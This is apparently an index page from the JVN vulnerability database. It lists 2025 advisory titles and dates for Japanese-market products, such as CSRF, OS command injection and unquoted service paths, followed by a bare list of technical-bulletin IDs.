jvndb-2025-000069 Web Caster V130 vulnerable to cross-site request forgery 2025-09-03T14:23+09:00 2025-09-03T14:23+09:00
jvndb-2025-000068 Seiko Solutions SkyBridge BASIC MB-A130 vulnerable to OS command injection 2025-09-01T16:21+09:00 2025-09-01T16:21+09:00
jvndb-2025-012659 Denial-of-service (DoS) vulnerability in Konica Minolta bizhub series 2025-09-01T15:22+09:00 2025-09-01T15:22+09:00
jvndb-2025-000067 Multiple vulnerabilities in multiple iND products 2025-08-29T14:47+09:00 2025-08-29T14:47+09:00
jvndb-2025-000066 Improper file access permission settings in multiple i-FILTER products 2025-08-27T19:50+09:00 2025-08-27T19:50+09:00
jvndb-2025-000064 Multiple vulnerabilities in SS1 2025-08-27T15:13+09:00 2025-08-27T15:13+09:00
jvndb-2025-000065 ScanSnap Manager installers vulnerable to privilege escalation 2025-08-27T14:22+09:00 2025-08-27T14:22+09:00
jvndb-2025-011884 FUJIFILM Healthcare Americas Synapse Mobility vulnerable to Privilege Escalation 2025-08-21T11:49+09:00 2025-08-25T10:38+09:00
jvndb-2025-000063 Western Digital Kitfox registers a Windows service with an unquoted file path 2025-08-22T13:37+09:00 2025-08-22T13:37+09:00
jvndb-2025-000062 Multiple vulnerabilities in Group-Office 2025-08-21T14:03+09:00 2025-08-21T14:03+09:00
jvndb-2025-000061 Multiple vulnerabilities in Movable Type 2025-08-20T15:30+09:00 2025-08-20T15:30+09:00
jvndb-2025-000059 Seagate Toolkit registers a Windows service with an unquoted file path 2025-08-14T12:32+09:00 2025-08-19T14:40+09:00
jvndb-2025-010854 Trend Micro Endpoint security products for enterprises vulnerable to multiple OS command injection 2025-08-07T12:25+09:00 2025-08-19T11:36+09:00
jvndb-2025-007521 Multiple Brother driver installers for Windows vulnerable to privilege escalation 2025-06-27T09:37+09:00 2025-08-19T11:29+09:00
jvndb-2025-000060 PgManage vulnerable to injection 2025-08-18T13:40+09:00 2025-08-18T13:40+09:00
jvndb-2025-000058 WordPress plugin "Advanced Custom Fields" vulnerable to HTML injection 2025-08-08T15:29+09:00 2025-08-08T15:29+09:00
jvndb-2025-010972 Multiple SEIKO EPSON products use weak initial passwords 2025-08-08T14:50+09:00 2025-08-08T14:50+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2025-005 TS-2025-005
ts-2025-004 TS-2025-004
ts-2025-003 TS-2025-003
ts-2025-002 TS-2025-002
ts-2025-001 TS-2025-001
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003